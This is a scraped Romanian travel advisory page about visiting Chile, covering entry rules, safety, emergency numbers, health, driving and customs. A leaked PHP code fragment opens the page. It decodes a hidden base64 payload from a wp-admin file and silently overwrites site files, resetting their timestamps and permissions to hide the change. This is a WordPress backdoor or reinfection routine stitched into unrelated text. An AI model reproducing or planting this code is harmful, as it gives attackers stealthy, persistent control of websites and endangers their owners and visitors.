$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Chile – O noua atitudine

Condiţii de intrare şi regim de şedere

Cetăţenii români pot intra, fără viză, pe teritoriul Republicii Chile, pentru o perioadă de până la 90 de zile în decurs de 6 luni de la data primei intrări.

Cetăţenii români care intenţionează să rămână pentru o perioadă mai îndelungată de 90 de zile sau să desfăşoare activităţi lucrative sau remunerate trebuie să obţină vizele corespunzătoare.

În cazul în care un minor călătoreşte în/ din Chile, singur sau însoţit de o terţă persoană, se va prezenta autorităţilor de frontieră chiliene o declaraţie notarială, tradusă în spaniolă, semnată de ambii părinţi (întocmită la un notar public din România, legalizată la Ministerul Justiţiei, Ministerul Afacerilor Externe şi Ambasada Chile la Bucureşti) prin care aceştia îşi exprimă acordul pentru călătoria copilului însoţit de persoana respectivă.

În situaţia în care minorul este însoţit doar de unul dintre părinţi, se va prezenta o declaraţie notarială semnată de celălalt părinte, prin care acesta îşi exprimă acordul pentru ieşirea din ţară a minorului.

Pentru informaţii suplimentare despre regimul vizelor şi despre condiţiile de intrare în Chile, recomandăm consultarea informaţiilor prezentate de autorităţile chiliene:

  • Ministerul Afacerilor Externe al Republicii Chile (www.minrel.gov.cl)
  • Ambasada Republicii Chile la Bucureşti

Ministerul Afacerilor Externe recomandă cetăţenilor români care intenţionează să rămână pentru o perioadă îndelungată pe teritoriul acestui stat să se adreseze misiunii diplomatice a României şi să îşi anunţe prezenţa în regiune, comunicând coordonatele personale pentru a putea fi contactaţi în situaţii de urgenţă.

Ameninţări teroriste

Riscul ameninţărilor teroriste în Chile este scăzut, însă cetăţenii români trebuie să aibă în vedere riscurile globale pe care fenomenul terorist le poate produce oriunde în lume.
Cetăţenilor români care călătoresc în Chile li se recomandă să urmărească în permanenţă anunţurile şi recomandările făcute de autorităţile chiliene şi să acceseze periodic pagina web a Ministerului român al Afacerilor Externe ( www.mae.ro ).

Siguranţă şi criminalitate 

În data de 27 februarie 2010, a avut loc un cutremur devastator soldat cu mai multe victime omeneşti. Avertizăm cetăţenii români care doresc să călătorească pe teritoriul acestui stat că Chile este o zonă seismică prin excelenţă.
Chile este o ţară sigură pentru turiştii străini în zonele centrale.
Tipul de infracţiuni în anumite zone periferice sunt furturile de bani, aparate de fotografiat şi electronice.

Pentru siguranţa dumneavoastră recomandăm:

  • Evitaţi circulaţia pe timp de noapte, locurile aglomerate, demonstraţiile şi deplasarea în zone izolate ale ţării.
  • Păstraţi în locuri sigure documentele şi valorile personale, biletele de călătorie, banii, cărţile de credit şi nu le expuneţi în mod vizibil asupra dumneavoastră sau în maşini.
  • Uşile si geamurile de la autovehicule trebuie ţinute închise.
  • În cazul călătoriilor cu autobuze sau trenuri este indicat să se păstreze atenţia asupra bagajelor pe întreaga durată a călătoriei
  • Dacă doriţi să călătoriţi în scop turistic, folosiţi numai operatori acreditaţi! Nu vă îndepărtaţi de grupul turistic şi respectaţi anunţurile sau indicaţiile autorităţilor locale!

În cazul în care sunteţi victima unei infracţiuni se recomandă contactarea celui mai apropiat birou al poliţiei, precum şi a Ambasadei României la Santiago de Chile.

În cazul pierderii paşaportului românesc, se recomandă sesizarea atât a biroului local de poliţie, cât şi a Ambasadei României la Santiago de Chile.

În cazul unor incidente grave (accidente, tâlhării), care necesită intervenţia imediată a autorităţilor chiliene, trebuie apelate următoarele numere de urgenţă:

  • Pompierii 132
  • Serviciului de Carabineros 133 (Poliţia militară, inclusiv trafic auto)
  • Serviciul de investigaţii 134
  • Informaţii 103

 

Sistemul medical

Încheiaţi o asigurare de călătorie, medicală şi de viaţă care sa acopere întreaga durată a călătoriei în Republica Chile.
Cheltuielile medicale în Chile sunt foarte costisitoare.
Pentru informaţii cu privire la tipurile de vaccinuri care trebuie efectuate, vă recomandăm să vă adresaţi Institutului Naţional de Sănătate Publică – Centrul Naţional de Supraveghere şi Control al Bolilor Transmisibile.

Condiţii privind traficul auto

  • Circulaţia auto:

Prioritatea este de dreapta.
Minorii trebuie să stea obligatoriu în spate, în scaun special amenajat.

  • Starea drumurilor:

Chile este o ţară cu o infrastructură modernă de şosele şi autostrăzi.
Starea generală a drumurilor este foarte bună.

  • Limitele de viteză admise:

Limitele de viteză sunt adaptate la specificul rutier. În general, pe autostrăzi, viteza este limitată la 120 km/h.

  • Centura de siguranţă:

Utilizarea centurii de siguranţă este obligatorie.

  • Parcarea: 

Parcarea se poate face numai în locurile special amenajate.
ncălcarea acestei reguli atrage amenzi considerabile.

  • Transportul public 

Sistemul de trafic aerian intern este bine dezvoltat, la nivelul celui internaţional.
Aeroportul Internaţional Arturo Merino Benitez funcţionează în condiţii normale.

  • Permisul de conducere:

Permisul de conducere eliberat de autorităţile române este recunoscut. Acesta se poate preschimba în cel chilian cu trecerea probelor medicale şi de aptitudini.

  • Informaţii utile pentru cazuri de accidente rutiere:

În cazul producerii unor accidente de circulaţie sau a altor evenimente soldate cu decesul unui cetăţean român, în Chile există un sistem specializat, denumit Hogar de Cristo, care asigură toate serviciile de repatriere.
Persoana responsabilă trebuie să anunţe Ambasada României din Santiago de Chile în vederea obţinerii certificatului de deces.

Utilizarea cărţilor de credit

În Chile se pot utiliza toate cărţile de credit şi sistemele de plată cunoscute pe plan internaţional.

Regimul vamal

La intrarea în Chile, toate persoanele trebuie să completeze o declaraţie foarte strictă, în care trebuie să declare cantităţile ce depăşesc:

  • 400 ţigări
  • 500 grame tutun de pipă
  • 50 ţigări de foi
  • 2,5 litri de alcool

Trebuie declarate sumele sau instrumentele de plată care depăşesc suma de 12.000 dolari SUA sau echivalentul în altă monedă.
În aceeaşi declaraţie trebuie menţionate toate cantităţile şi natura produselor vegetale şi animale.
Este strict interzisă introducerea oricăror alimente şi fructe.

Regimul medicamentelor

Pot fi introduse medicamente în cantităţi pentru uzul personal pe baza certificatului medical care să ateste boala cronică a celui în cauză.

By o9admin